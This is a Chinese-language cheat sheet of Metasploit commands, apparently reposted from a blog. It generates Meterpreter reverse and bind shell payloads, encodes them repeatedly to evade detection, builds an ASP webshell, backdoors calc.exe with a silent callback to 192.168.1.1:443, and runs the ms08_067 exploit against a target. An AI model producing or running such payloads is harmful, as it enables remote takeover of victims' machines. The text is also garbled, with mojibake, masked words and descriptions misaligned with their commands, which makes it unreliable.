MSF常用的监听模块命令
msfpayload 命令
? 幫助
msfpayload?-h? 列出所有可用的***載荷??
??列出所有windows/meterpreter/bind_tcp 下***載荷的配置項(任何***載荷都是可以配置的)
msfpayload?windows/meterpreter/bind_tcp?O.??創(chuàng)建一個meterperter的reverse_tcp***載荷,回連到y(tǒng)our ip的端口,將其保存為名為payload.exe的windows可執(zhí)行程序
msfpayload?windows/meterpreter/reverse_tcp?LHOST=your?ip?LPORT=port?X?>?payload.exe??與上生成同樣的***載荷,導出成原始格式文件,該文件將后面的MSFencode中使用
msfpayload?windows/meterpreter/reverse_tcp?LHOST=your?ip?LPORT=port?R?>?payload.raw??與上面生成同樣的***載荷,但導出成C格式的shellcode
msfpayload?windows/meterpreter/bind_tcp?LPORT=port?C?>?payload.c??導出成以%U編碼方式的javascript語言字符串
msfpayload?windows/meterpreter/bind_tcp?LPORT=port?J?>?payload.java??產生webshell將此webshell上傳到服務器,這個步驟要有上傳權限
msfpayload?windows/meterpreter/reverse_tcp?LHOST=your_ip?|?msfencode?-t?asp?-o?webshell.asp? 啟動msfconsole 輸入:
use?exploits/multi/handlerset?PAYLOAD?windows/meterpreter/reverse_tcpset?LHOST?your_ipexploitmsfencode 命令
? ?幫助
msfencode?-h? 列出所有可用的編碼器
msfencode?-l??顯示編碼緩沖區(qū)的格式
msfencode?-t?(c,elf,java,js_Le,js_be,perl,raw,ruby,vba,vbs,loop-vbs,asp,war,macho)??使用shikata_ga_nai編碼器對payload.raw文件進行5次編碼,然后導出一個名為encoded_payload.exe的文件
msfencode?-i?payload.raw?-o?encoded_payload.exe?-e?x86/shikata_ga_nai?-c?5?-t?exe??創(chuàng)建一個經過多種編碼格式的嵌套編碼的***載荷
msfpayload?windows/meterpreter/bind_tcp?LPORT=port?R?|?msfencode?-e?x86/_countdown?-c?5?-t?raw?|?msfencode?-e?x86/shikata_ga_nai?-c?5?-t?exe?-o?multi-encoded_payload.exe??創(chuàng)建一個純字母數(shù)字的shellcode,由ESI寄存器指向shellcode,以C語言格式輸出
msfencode?-i?payload.raw?BufferRegister=ESI?-e?x86/alpha_mixed?-t?cmsfcli命令
僅列出******模塊
msfcli|grep?exploit僅列出與windows相關的******模塊
msfcli|grep?exploit/windows對對方IP發(fā)起ms08_067_natapi******,配置bind_tcp***載荷,并綁定在443端口進行監(jiān)聽
msfcli?exploit/windows/smb/ms08_067_netapi?PAYLOAD=windows/meterpreter/bind_ctp?LPORT=443?RHOST=對方IP?Emetasploit高級忍術
?創(chuàng)建一個反彈式的meterpreter***載荷,回連到192.168.1.1主機的443端口,使用calc.exe作為載苛后門程序,讓載荷執(zhí)行流一直運行在被***的應用程序中,最后生成以.shikata_ga_nai編碼器編碼后的***載荷可執(zhí)行程序payload.exe
msfpayload?windows/meterpreter/reverse_tcp?LHOST=192.168.1.1?LPORT=443?R?|?msfencode?-x?calc.exe?-k?-o?payload.exe?-e?x86/skikata_ga_nai?-c?7?-t?exe創(chuàng)建一個反彈式的meterpreter***載荷,回連到192.168.1.1主機的443端口,使用calc.exe作為載苛后門程序,不讓載荷執(zhí)行流一直運行在被***的應用程序中,同時在***載荷執(zhí)行后也不會在目標主機上彈出任何信息,這種配置非常有用,當你通過瀏覽器漏洞控制了遠程主機,并不想讓計算器程序打開呈現(xiàn)在目標用戶面前。同樣,最后生成用.shikata_ga_nai編碼器的***載荷可執(zhí)行程序payload.exe
msfpayload?windows/meterpreter/reverse_tcp?LHOST=192.168.1.1?LPORT=443?R?|?msfencode?-x?calc.exe?-o?payload.exe?-e?x86/skikata_ga_nai?-c?7?-t?exe創(chuàng)建一個raw格式的bind_tcp模式meterpreter***載荷,用.shikata_ga_nai編碼7次,輸出以payload.exe命名的windows可執(zhí)行程序文件,同時啟用多路監(jiān)聽方式進行執(zhí)行
msfpayload?windows/meterpreter/bind_tcp?LHOST=192.168.1.1?LPORT=443?R?|?msfencode?-o?payload.exe?-e?x86/shikata_ga_nai?-c?7?-t?exe?&&?msfcli?multi/handler?PAYLOAD=windows/meterpreter/bind_tcp?LPORT=443?E轉載于:https://blog.51cto.com/biock/1658668
總結
以上是生活随笔為你收集整理的MSF常用的监听模块命令的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Python学习(七) 流程控制if语句
- 下一篇: MySQL Windows ZIP 免费